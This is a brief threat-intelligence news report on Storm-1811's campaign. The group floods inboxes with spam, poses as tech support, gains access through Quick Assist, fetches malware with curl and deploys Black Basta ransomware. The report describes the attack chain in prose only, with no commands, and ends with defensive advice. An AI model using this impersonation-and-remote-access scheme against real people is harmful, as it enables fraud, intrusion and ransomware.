Storm-1811 Exploits Quick Assist for Social Engineering Attacks

The Microsoft Threat Intelligence team has uncovered a new campaign by the group Storm-1811, utilizing the Quick Assist tool to conduct social engineering attacks on users.

Quick Assist is a legitimate Microsoft application that allows users to connect to another device via a remote connection to resolve technical issues. The application is installed by default on Windows 11 devices.

The attacker exploits Quick Assist to carry out social engineering attacks, posing as a trusted contact to gain initial access to the victim’s device. To make the attacks more convincing, the hacker employs the link listing method, subscribing the victim’s email addresses to various mailing lists to flood their inbox with spam.

The cybercriminal then calls the victim, posing as a tech support agent offering assistance with the spam issue. The connection to the device is established through Quick Assist. Once the user grants access, the attacker executes a curl command to download and execute malicious files. The obtained access is used to enumerate domains and move laterally across the network, after which PsExec is employed to deploy the Black Basta ransomware.

The campaign, which began in mid-April, targets various industries including manufacturing, construction, food, and transportation, indicating the opportunistic nature of the attacks.

Organizations are advised to block or remove Quick Assist and similar tools if they are not in use, and to educate employees on recognizing such scams.

Storm-1811 is a financially motivated group known for using the Black Basta ransomware. The attack scheme starts with impersonating phone calls, during which the attackers, posing as Microsoft tech support or the victim’s company IT specialists, persuade the victim to install remote monitoring and management tools. Subsequently, QakBot, Cobalt Strike, and ultimately, Black Basta are delivered to the device.